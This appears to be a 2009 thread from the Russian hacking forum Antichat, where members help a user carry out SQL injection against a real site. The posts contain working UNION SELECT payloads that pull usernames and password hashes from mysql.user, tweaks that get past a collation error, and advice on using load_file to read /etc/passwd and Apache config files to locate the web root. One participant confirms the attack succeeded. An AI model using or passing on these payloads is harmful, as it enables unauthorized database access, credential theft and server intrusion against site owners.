Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.12.2009, 15:21
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от jokester
И что, работает так?
Тебе тоже не мешает, кстати, статьи перечитать  Ну или по синтаксису что-то Незнаю как у вас, но у меня заработало, я непомню на каком именно сайте, но работало 100 %.
Возможно условия разные просто.
Кстате точно надо повторить...
ps
Сгуглил даже, http://forum.prologic.su/index.php?showtopic=3612&st=0&p=13019&#entry13019
Последний раз редактировалось Ctacok; 07.12.2009 в 15:24..
|
|
|
07.12.2009, 15:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Ctacok
Незнаю как у вас, но у меня заработало, я непомню на каком именно сайте, но работало 100 %.
Возможно условия разные просто.
Кстате точно надо повторить...
ps
Сгуглил даже, http://forum.prologic.su/index.php?showtopic=3612&st=0&p=13019&#entry13019
Возможно просто синтаксис нужен правильный, или у хакеров и так покатит?
http://dev.mysql.com/doc/refman/5.1/en/encryption-functions.html#function_aes-decrypt
Последний раз редактировалось jokester; 07.12.2009 в 15:33..
|
|
|
|
07.12.2009, 15:34
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от jokester
И что, работает так?
Тебе тоже не мешает, кстати, статьи перечитать Ну или по синтаксису что-то нет не работает,я с твоего поста смотрел.
|
|
|
|
07.12.2009, 15:37
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,unhex(hex(concat_w s(0x3a,user,password))),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/* |
|
|
|
07.12.2009, 15:37
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от p.r0phe.t
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,convert(concat_ws( ";",user,password)+using+cp1251_general_ci),8, 9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
Как-то так. Не проверял.
|
|
|
|
07.12.2009, 15:40
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
всем спасибо,сделал так:
?id=-10256'+union+select+1,2,3,4,5,6,user,cast(password +as+binary),9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27+from+mysql.user+limit+3,1/*
|
|
|
|
07.12.2009, 15:50
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Ещё вопрос,какими способами,имея лоадфайл (какие конфиги почитать) найти путь до сайта?
ОС: CentOS
Последний раз редактировалось p.r0phe.t; 07.12.2009 в 16:16..
|
|
|
|
07.12.2009, 17:12
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от p.r0phe.t
Ещё вопрос,какими способами,имея лоадфайл (какие конфиги почитать) найти путь до сайта?
ОС: CentOS
CentOS, Fedora (Redhat-системы)
/etc/httpd/conf/httpd.conf
/etc/passwd
/etc/groups
вообщем читай все што сможеш а там подсмотриш путь)
P.S. Узнай версию апача...
Последний раз редактировалось 547; 07.12.2009 в 17:15..
|
|
|
|
07.12.2009, 17:21
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
вот пути в этой теме
https://forum.antichat.ru/thread49775.html
перебирай или сиптом или на darkc0de были какието переборщики
|
|
|
|
07.12.2009, 17:21
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от 547
/etc/httpd/conf/httpd.conf
Путями и не пахнет
Сообщение от 547
P.S. Узнай версию апача...
А зачем? ну 2.2.3...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
